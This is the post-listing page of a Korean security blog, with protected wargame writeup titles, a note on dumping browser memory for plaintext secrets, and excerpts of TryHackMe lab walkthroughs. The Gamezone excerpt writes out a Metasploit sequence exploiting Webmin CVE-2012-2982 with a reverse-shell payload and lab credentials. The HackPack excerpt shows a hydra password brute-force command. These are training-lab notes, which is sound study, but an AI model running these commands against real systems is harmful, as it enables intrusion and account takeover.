blind sql injection advanced writeup
·
Play/wargame
보호되어 있는 글입니다.
SQL Injection Bypass WAF (+advanced) writeup
·
Play/wargame
보호되어 있는 글입니다.
[웹] 브라우저 메모리 내 정보 노출 확인
·
보안/웹·모바일
브라우저 메모리 보는 방법 1. PID 확인→ Shift + Esc 2. 작업관리자에서 해당 프로세스 우클릭, 덤프파일 만들기 3. 만들어진 덤프파일 HxD로 확인  메모리 내 중요정보가 평문으로 노출되어 있을 경우 취약임.그냥 덤프하지말고, 특정 작업 이후에 덤프할 것. EX) 회원가입 후, 회원정보 변경 후, 신분증 인증 후 등....
error based sqli writeup
·
Play/wargame
보호되어 있는 글입니다.
blind-command writeup
·
Play/wargame
보호되어 있는 글입니다.
DOM-XSS writeup
·
Play/wargame
보호되어 있는 글입니다.
THM Offensive Pentesting - Gamezone
·
System/침투
TASK 6 Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine. Webmin version : 1.580 vulun : CVE-2012-2982 use exploit/unix/webapp/webmin_show_cgi_exec set RHOSTS set RPORT 10000 set SSL false set USERNAME agent47 set PASSWORD videogamer124 set payload cmd/unix/reverse_python set LHOST set LPORT 10000 exploit
THM Offensive Pentesting - HackPack
·
System/침투
HackPack은 따로 포스팅 안하려고 했는데.. 이렇게라도 적지 않으면 기억나지 않을 듯 하여 포스팅한다. (실습 도중 어택박스가 계속 끊겨서 타겟 IP, 어태커IP 변경이 잦다) TASK 2 1. Login 로그인을 위해 hydra 사용 THM 지시 : hydra -l -P /usr/share/wordlists/ http-post-form 그런데 이대로 작성하면 안되고, 뒤에 좀 더 덧붙여주어야 함. wordlist는 kali에 기본적으로 주어지는 rockyou.txt를 사용했고, http-post-form 뒤에 덧붙일 것. * hydra 사용법은 여기를 참고하자 hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.78.71 http-post-form..